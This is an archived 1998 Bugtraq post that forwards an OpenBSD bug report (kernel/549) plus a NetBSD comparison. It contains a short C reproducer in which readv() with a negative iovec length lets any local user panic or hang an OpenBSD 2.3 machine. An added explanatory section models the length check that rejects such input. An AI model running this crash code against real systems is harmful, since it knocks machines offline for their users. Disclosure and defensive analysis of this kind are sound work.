Bugtraq mailing list archives
Re: Fwd: Any user can panic OpenBSD machine
From: thorpej () nas nasa gov (Jason Thorpe)
Date: Mon, 27 Jul 1998 11:21:46 -0700
On Mon, 27 Jul 1998 11:23:59 -0600 Michael Fuhr <mfuhr () DIMENSIONAL COM> wrote: To see if this is a generic *BSD bug, I checked a NetBSD-current (1.3F) machine. NetBSD 1.3F is NOT vulnerable; the readv() returns EINVAL. I performed the NetBSD test on both a PPro (i386) and Shark (arm32).
-----Forwarded message from jon () oaktree co uk-----

Message-Id: <199807271126.MAA16724 () chalk oaktree net uk>
Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
From: jon () oaktree co uk
To: gnats () openbsd org
X-Send-Pr-Version: 3.97
Subject: kernel/549: Any user can panic OpenBSD machine
Sender: owner-bugs () openbsd org

Number: 549
Category: kernel
Synopsis: readv with -ve block size panics kernel
Confidential: yes
Severity: critical
Priority: high
Responsible: bugs
State: open
Class: sw-bug
Submitter-Id: net
Arrival-Date: Mon Jul 27 05:40:02 MDT 1998
Last-Modified:
Originator: Jon Ribbens
Organization:
\/ Jon Ribbens / jon () oaktree co uk
Release: 2.3
Environment:
System : OpenBSD 2.3
Architecture: OpenBSD.i386
Machine : i386
Description:
readv with one of the blocks having a -ve size panics the kernel. Oops.
How-To-Repeat:

    #include <sys/types.h>
    #include <sys/uio.h>
    #include <unistd.h>

    int main(void)
    {
      struct iovec iov[1];
      char buffer[1024];

      iov[0].iov_base = buffer;
      iov[0].iov_len = -1;
      return readv(0, iov, 1);
    }

run the above program, type a few characters, press return, observe either kernel panic or machine hang. panic message is "panic: ureadc: non-positive resid". Any user can do this.
Fix:
Dunno I'm afraid.
Audit-Trail:
Unformatted:

-----End of forwarded message-----

--
Michael Fuhr
http://www.fuhr.net/~mfuhr/
Jason R. Thorpe                thorpej () nas nasa gov
NASA Ames Research Center      Home: +1 408 866 1912
NAS: M/S 258-5                 Work: +1 650 604 0935
Moffett Field, CA 94035        Pager: +1 650 940 5942
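The EINVAL result reported above is what a length check on each iovec entry produces before any data is copied. The following is an added example, not code from these messages or from any BSD kernel: a user-space C model of such a check, in which iov_total_len, check_lens and the IOV_LIMIT value are names and values assumed for illustration.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/uio.h>

#ifndef SSIZE_MAX                     /* fallback if <limits.h> hides it */
#define SSIZE_MAX ((ssize_t)(((size_t)-1) >> 1))
#endif
#define IOV_LIMIT 1024                /* assumed cap on iovcnt, for illustration */

/* Hypothetical helper: validate an iovec array before any copy is attempted.
 * Returns 0 and stores the byte total in *total, or EINVAL. */
static int iov_total_len(const struct iovec *iov, int iovcnt, ssize_t *total)
{
    size_t sum = 0;

    if (iov == NULL || iovcnt <= 0 || iovcnt > IOV_LIMIT)
        return EINVAL;
    for (int i = 0; i < iovcnt; i++) {
        size_t len = iov[i].iov_len;  /* iov_len = -1 is SIZE_MAX here */

        if (len > (size_t)SSIZE_MAX)          /* "negative" length */
            return EINVAL;
        if (len > (size_t)SSIZE_MAX - sum)    /* total would overflow ssize_t */
            return EINVAL;
        sum += len;
    }
    *total = (ssize_t)sum;
    return 0;
}

/* Driver: build a two-entry vector with the given lengths and validate it. */
static int check_lens(size_t a, size_t b)
{
    static char buf[16];              /* never dereferenced by the check */
    struct iovec iov[2] = { { .iov_base = buf, .iov_len = a },
                            { .iov_base = buf, .iov_len = b } };
    ssize_t total;

    return iov_total_len(iov, 2, &total);
}

int main(void)
{
    printf("1024 + 0      -> %d\n", check_lens(1024, 0));
    printf("-1 + 0        -> %d\n", check_lens((size_t)-1, 0));
    printf("SSIZE_MAX + 1 -> %d\n", check_lens((size_t)SSIZE_MAX, 1));
    return 0;
}
```

The second comparison matters as much as the first: entries that are each valid can still sum past SSIZE_MAX, leaving a residual count that is negative when read as signed.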